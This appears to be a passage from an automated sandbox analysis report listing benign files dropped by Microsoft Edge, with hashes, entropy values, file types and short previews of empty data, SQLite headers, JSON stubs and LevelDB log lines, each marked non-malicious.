                                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlx+l:Ls3s
                                                                                                                                                                                                                                                                                                                  MD5:B17F1D2F34C1CCB75A7E8FA61979C682
                                                                                                                                                                                                                                                                                                                  SHA1:F593294B3A146C007F65502F65BF0482D29DA02A
                                                                                                                                                                                                                                                                                                                  SHA-256:E5DBCC51CACAC1222B996CFDBB7AF6428CD609077FDC37819DA827E82C0AB022
                                                                                                                                                                                                                                                                                                                  SHA-512:6C064AF911F34E44FB43C33155921D0CC009B747127C3A3362E00111E1811AA12E7FDC14E4FF5F4072E975D446B38EF137DBC5B509575C87FA001215161BED5E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:..........................................P./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.268698638795829
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:7EOQyvYfYebvqBQFUtCg/gQR5JfYebvqBvJ:7EO5YfYebvZgCHSJfYebvk
                                                                                                                                                                                                                                                                                                                  MD5:C4BEDF4C43924B326594DB683A8C21F5
                                                                                                                                                                                                                                                                                                                  SHA1:E7D51466F3941A84DB6C091FE7177AA79847964B
                                                                                                                                                                                                                                                                                                                  SHA-256:2BD953B801EB50EB9D0A3103A696658703E58131491BFCF187DD77A5B9250DF9
                                                                                                                                                                                                                                                                                                                  SHA-512:76DDD9FF9196CC85DC4A2308DED3E7A00DF6D106E7C6C6E7193B94384D92B7C65B1034AC072E7D7C0179107145BFEE181C21B555935F050CB6BA90E33BCFC2FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.555 1ba8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-04:59:17.561 1ba8 Recovering log #3.2025/01/09-04:59:17.565 1ba8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.268698638795829
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:7EOQyvYfYebvqBQFUtCg/gQR5JfYebvqBvJ:7EO5YfYebvZgCHSJfYebvk
                                                                                                                                                                                                                                                                                                                  MD5:C4BEDF4C43924B326594DB683A8C21F5
                                                                                                                                                                                                                                                                                                                  SHA1:E7D51466F3941A84DB6C091FE7177AA79847964B
                                                                                                                                                                                                                                                                                                                  SHA-256:2BD953B801EB50EB9D0A3103A696658703E58131491BFCF187DD77A5B9250DF9
                                                                                                                                                                                                                                                                                                                  SHA-512:76DDD9FF9196CC85DC4A2308DED3E7A00DF6D106E7C6C6E7193B94384D92B7C65B1034AC072E7D7C0179107145BFEE181C21B555935F050CB6BA90E33BCFC2FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.555 1ba8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-04:59:17.561 1ba8 Recovering log #3.2025/01/09-04:59:17.565 1ba8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.555790634850688
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                                                  MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                                                                                                                                  SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                                                                                                                                  SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                                                                                                                                  SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.245903465370569
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:7r+yvYfYebvqBZFUt5F/vn5JfYebvqBaJ:7FYfYebvygJJfYebvL
                                                                                                                                                                                                                                                                                                                  MD5:9A54868F9B23384593BB05D817D174F4
                                                                                                                                                                                                                                                                                                                  SHA1:F3CFA9E09A489D9B77D6ADFC38843444D02B0A80
                                                                                                                                                                                                                                                                                                                  SHA-256:D480825C2892AF9A8A0F2AAD73B9B6FED5CC900ADDA50C46A87F397648D4735D
                                                                                                                                                                                                                                                                                                                  SHA-512:9BBB9FA6BD502AB6943A7BFFC08C4C8460A85D89B8CF0B35354F3AA808ED3850D69BCC84C902C94DA2792B17F77446556A93B59334A4F4F72C169F8115A0DFF6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:33.357 1900 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-04:59:33.358 1900 Recovering log #3.2025/01/09-04:59:33.361 1900 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.245903465370569
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:7r+yvYfYebvqBZFUt5F/vn5JfYebvqBaJ:7FYfYebvygJJfYebvL
                                                                                                                                                                                                                                                                                                                  MD5:9A54868F9B23384593BB05D817D174F4
                                                                                                                                                                                                                                                                                                                  SHA1:F3CFA9E09A489D9B77D6ADFC38843444D02B0A80
                                                                                                                                                                                                                                                                                                                  SHA-256:D480825C2892AF9A8A0F2AAD73B9B6FED5CC900ADDA50C46A87F397648D4735D
                                                                                                                                                                                                                                                                                                                  SHA-512:9BBB9FA6BD502AB6943A7BFFC08C4C8460A85D89B8CF0B35354F3AA808ED3850D69BCC84C902C94DA2792B17F77446556A93B59334A4F4F72C169F8115A0DFF6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:33.357 1900 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-04:59:33.358 1900 Recovering log #3.2025/01/09-04:59:33.361 1900 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):323
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.256870833267779
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJIBGi+q2Pwkn23oH+TcwtpIFUtJbJIDjZZmwPbJIWb9VkwOwkn23oH+Tcwt7:72wi+vYfYebmFUt4D9/yWb9V5JfYebaQ
                                                                                                                                                                                                                                                                                                                  MD5:3DD2B4C56AD762FDFBC008C452863B0A
                                                                                                                                                                                                                                                                                                                  SHA1:42BCFBC44001702F6577310C9C61ABC2AA354439
                                                                                                                                                                                                                                                                                                                  SHA-256:04E7F21667DA2B11B399884764CB8AB4103E2F45661DAD18E3BB46EF2AA61294
                                                                                                                                                                                                                                                                                                                  SHA-512:21D8C601D2FDFCA5C41461FD9F74DA1D3CFA993BEAA5E9CAF445F0787CF7093E06A18B8BC615D78B635529A3772EE5FB5A92B662229718F20020633F616BABB8
